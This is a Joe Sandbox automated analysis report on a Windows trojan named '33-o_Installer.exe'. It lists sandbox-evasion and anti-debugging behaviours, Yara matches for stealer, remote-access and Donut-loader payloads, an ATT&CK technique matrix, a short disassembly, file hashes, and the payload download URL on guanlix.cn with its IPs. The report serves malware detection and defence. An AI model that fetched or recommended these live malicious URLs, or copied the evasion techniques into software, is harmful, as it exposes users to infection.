            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\33-o_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\33-o_Installer.exeMemory allocated: 33F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeMemory allocated: 3630000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeMemory allocated: 3450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeWindow / User API: threadDelayed 3374Jump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeWindow / User API: threadDelayed 6477Jump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exe TID: 6536Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exe TID: 6204Thread sleep count: 3374 > 30Jump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exe TID: 6204Thread sleep count: 6477 > 30Jump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
            Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: 33-o_Installer.exe, 00000000.00000002.4497277372.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\33-o_Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25602
            Source: C:\Users\user\Desktop\33-o_Installer.exeAPI call chain: ExitProcess graph end nodegraph_0-25785
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DC65D1
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00DD40E4
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_03371628 mov eax, dword ptr fs:[00000030h]0_2_03371628
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DD7CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00DD7CB1
            Source: C:\Users\user\Desktop\33-o_Installer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC65D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DC65D1
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DCA792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DCA792
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DCC78D SetUnhandledExceptionFilter,0_2_00DCC78D
            Source: C:\Users\user\Desktop\33-o_Installer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC1671 cpuid 0_2_00DC1671
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00DCF895
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: GetLocaleInfoA,0_2_00DD4859
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00DCE04E
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_00DCF9F8
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00DCF9BC
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00DCF955
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00DCF4CD
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,0_2_00DD44BA
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00DCECAA
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,0_2_00DCDC2B
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00DCF5C2
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00DD4594
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00DCF6C4
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_00DCF669
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_00DC5FC5
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,0_2_00DCEF98
            Source: C:\Users\user\Desktop\33-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeCode function: 0_2_00DC41BA GetSystemTimeAsFileTime,__aulldiv,0_2_00DC41BA
            Source: C:\Users\user\Desktop\33-o_Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\33-o_Installer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 33-o_Installer.exe PID: 4292, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0.2.33-o_Installer.exe.5820000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.33-o_Installer.exe.5820000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 33-o_Installer.exe PID: 4292, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory131
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
            Virtualization/Sandbox Evasion
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets34
            System Information Discovery
            SSHKeylogging12
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Software Packing
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            33-o_Installer.exe32%ReversingLabsWin32.Trojan.Doina
            33-o_Installer.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://guanlix.cn:881/33.ccp~0%Avira URL Cloudsafe
            117.41.184.330%Avira URL Cloudsafe
            http://guanlix.cn:881/33.ccp0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            guanlix.cn
            91.208.240.157
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://guanlix.cn:881/33.ccpfalse
              • Avira URL Cloud: safe
              unknown
              117.41.184.33true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://guanlix.cn:881/33.ccp~33-o_Installer.exe, 00000000.00000002.4497277372.0000000000ABB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name33-o_Installer.exe, 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              91.208.240.157
              guanlix.cnunknown
              139659LUCID-AS-APLUCIDACLOUDLIMITEDHKfalse
              117.41.184.33
              unknownChina
              134238CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCNtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466306
              Start date and time:2024-07-02 19:20:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 41s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:4
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:33-o_Installer.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 28
              • Number of non-executed functions: 33
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 33-o_Installer.exe
              TimeTypeDescription
              13:21:01API Interceptor8913172x Sleep call for process: 33-o_Installer.exe modified
              No context
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CT-JIANGXI-IDCCHINANETJiangxprovinceIDCnetworkCNhttps://seoauthoritybook.com/Get hashmaliciousUnknownBrowse
              • 106.225.194.35
              skt.m68k.elfGet hashmaliciousMiraiBrowse
              • 59.63.219.186
              #U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
              • 59.63.226.86
              2024#U5e74#U4e8c#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
              • 59.63.226.86
              SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exeGet hashmaliciousPoisonivyBrowse
              • 106.225.194.35
              2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
              • 59.63.226.86
              2024#U5e74#U4e00#U5b63#U5ea6#U5458#U5de5#U8865#U52a9#U6d41#U7a0b.docx.docGet hashmaliciousUnknownBrowse
              • 59.63.226.86
              pKO4Qel23K.elfGet hashmaliciousMiraiBrowse
              • 59.63.167.214
              JKfLgrv17o.elfGet hashmaliciousMiraiBrowse
              • 59.63.219.189
              JKtUqTCOma.elfGet hashmaliciousMiraiBrowse
              • 59.63.167.208
              LUCID-AS-APLUCIDACLOUDLIMITEDHKhttps://telegram-wv.icu/Get hashmaliciousUnknownBrowse
              • 103.143.81.212
              #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
              • 45.136.13.176
              #U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exeGet hashmaliciousUnknownBrowse
              • 45.136.13.176
              CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
              • 103.143.81.180
              CXM5Rc4W2k.exeGet hashmaliciousGhostRatBrowse
              • 103.143.81.180
              dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
              • 45.136.14.159
              dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
              • 45.136.14.159
              qrUvlKkf7N.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.162
              qwb3x7yFdW.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.183
              sora.arm.elfGet hashmaliciousMiraiBrowse
              • 45.144.137.155
              No context
              No context
              Process:C:\Users\user\Desktop\33-o_Installer.exe
              File Type:data
              Category:dropped
              Size (bytes):71938
              Entropy (8bit):7.604676564541333
              Encrypted:false
              SSDEEP:1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
              MD5:1BEA636EC9B170D6306D6082552DD002
              SHA1:920644E8AA039A829A58C4EF7065B61208795605
              SHA-256:D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
              SHA-512:DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
              Malicious:false
              Yara Hits:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.cod, Author: unknown
              Reputation:low
              Preview:.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2
              Process:C:\Users\user\Desktop\33-o_Installer.exe
              File Type:data
              Category:dropped
              Size (bytes):71938
              Entropy (8bit):7.604676564541333
              Encrypted:false
              SSDEEP:1536:u7rl7/dDEWTG0KHvpLhkUsYywwI6aM6eKXBwLsy1ETqfvu+P4Rtsj5o:enTG0KBLfsYywwTaMRKXBwLs/
              MD5:1BEA636EC9B170D6306D6082552DD002
              SHA1:920644E8AA039A829A58C4EF7065B61208795605
              SHA-256:D90BF4D25240AA036B21D8FDF1F1F3F55CD03C61EAB7F941624F96D3C70AACFC
              SHA-512:DCCDE5A72EF3203CD68AE6497B9D9D5322387F7196F66C1042D16F3F54AB12A6955CBD1E286477089C601041208E8F017D5BDFB003CDBD377054BC975D2139D7
              Malicious:false
              Yara Hits:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\33[1].ccp, Author: unknown
              Reputation:low
              Preview:.......Xm.0N~.2.oi...../:..#E......5.....r..V...Q.Z.....x...G.......2.....|'......B.u...\...d#..>.....H..n'...H4n...W.......k..>...W4......w..J...Z..$@.../....M?..=o...'.z.....$....%....Y..".).|.?.Q.:u.]l....L.GP.f.../L.izV..n.Hv...{.Ua.x..BV.OS....|.$;..@a`.._........}....k....M..'(.............................................................................................................................................................................................................................................................(j...Y....Y.2..I..PZ.P..k<.AT...HYZ.Ip3.7...\..<.m`.......w...(.gw..!.).@{...3....h".l....=.jz.Z^T.V.k^[W...J....\s.>...W.y....N..n..."..j....X....B....d.Z.....L..x. ...{.J1_.\.........<p.N......oND..?=./N.r.*..X<..8.....:P..H.M......Ot.^....|".X...E...?...i....I'.g...]Ek.....(..E]..F.,..A}..?...t.Q. }5l....\TT...$......N.....fHP9.#3.qKo.x...~..k.k...hN;.........<_.r.m{.o..R.p?..-..E......k.......aj`.=..d..2
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):5.939909088547916
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:33-o_Installer.exe
              File size:249'344 bytes
              MD5:baf30c254157b0f36a967ccfdb3850ed
              SHA1:0734a94d3cd6b3048d6d99c26b1fdea0cd19ab00
              SHA256:af40db9d594f00fe032b9b50177907efc872157abd3ab488c09584a0ceb3da04
              SHA512:dbe3cbcf9f72c3e57ebb2161ef8fcc96c55aa39e960ce498f22163f0c554cbbb291d3f33378569a3213c57fe810e78cb547f265fd4cc2d6e72ea4f8a7c2d4dc7
              SSDEEP:3072:euWmO3uTwghfpRBCa5XrD5sxTQ14b7QNaV4ZQeAnuTCt2xbzmyoaq6rcYsc8kOee:euW4TwSR57aTQ+QN4njZ2x0p
              TLSH:63346B92F6C0D4B6D81711B5D83ADEB2126BBD798974010B36A4372F5EB72831937E0B
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L......f.................v...T.....
              Icon Hash:20246c0c56e20926
              Entrypoint:0x405b41
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x66820682 [Mon Jul 1 01:29:38 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:0b47c746b58dc722dcec07246158fda2
              Instruction
              call 00007F48F47DCEC5h
              jmp 00007F48F47D592Eh
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              test eax, eax
              je 00007F48F47D5AB4h
              sub eax, 08h
              cmp dword ptr [eax], 0000DDDDh
              jne 00007F48F47D5AA9h
              push eax
              call 00007F48F47D438Fh
              pop ecx
              pop ebp
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              mov eax, dword ptr [ebp+08h]
              push esi
              mov esi, ecx
              mov byte ptr [esi+0Ch], 00000000h
              test eax, eax
              jne 00007F48F47D5B05h
              call 00007F48F47D96BEh
              mov dword ptr [esi+08h], eax
              mov ecx, dword ptr [eax+6Ch]
              mov dword ptr [esi], ecx
              mov ecx, dword ptr [eax+68h]
              mov dword ptr [esi+04h], ecx
              mov ecx, dword ptr [esi]
              cmp ecx, dword ptr [004201F8h]
              je 00007F48F47D5AB4h
              mov ecx, dword ptr [0041FFB0h]
              test dword ptr [eax+70h], ecx
              jne 00007F48F47D5AA9h
              call 00007F48F47DD89Fh
              mov dword ptr [esi], eax
              mov eax, dword ptr [esi+04h]
              cmp eax, dword ptr [0041FEB8h]
              je 00007F48F47D5AB8h
              mov eax, dword ptr [esi+08h]
              mov ecx, dword ptr [0041FFB0h]
              test dword ptr [eax+70h], ecx
              jne 00007F48F47D5AAAh
              call 00007F48F47DD0FEh
              mov dword ptr [esi+04h], eax
              mov eax, dword ptr [esi+08h]
              test byte ptr [eax+70h], 00000002h
              jne 00007F48F47D5AB6h
              or dword ptr [eax+70h], 02h
              mov byte ptr [esi+0Ch], 00000001h
              jmp 00007F48F47D5AACh
              mov ecx, dword ptr [eax]
              mov dword ptr [esi], ecx
              mov eax, dword ptr [eax+04h]
              mov dword ptr [esi+04h], eax
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 10h
              mov eax, dword ptr [0041F920h]
              xor eax, ebp
              mov dword ptr [ebp-04h], eax
              mov edx, dword ptr [ebp+18h]
              push ebx
              Programming Language:
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [C++] VS2010 build 30319
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
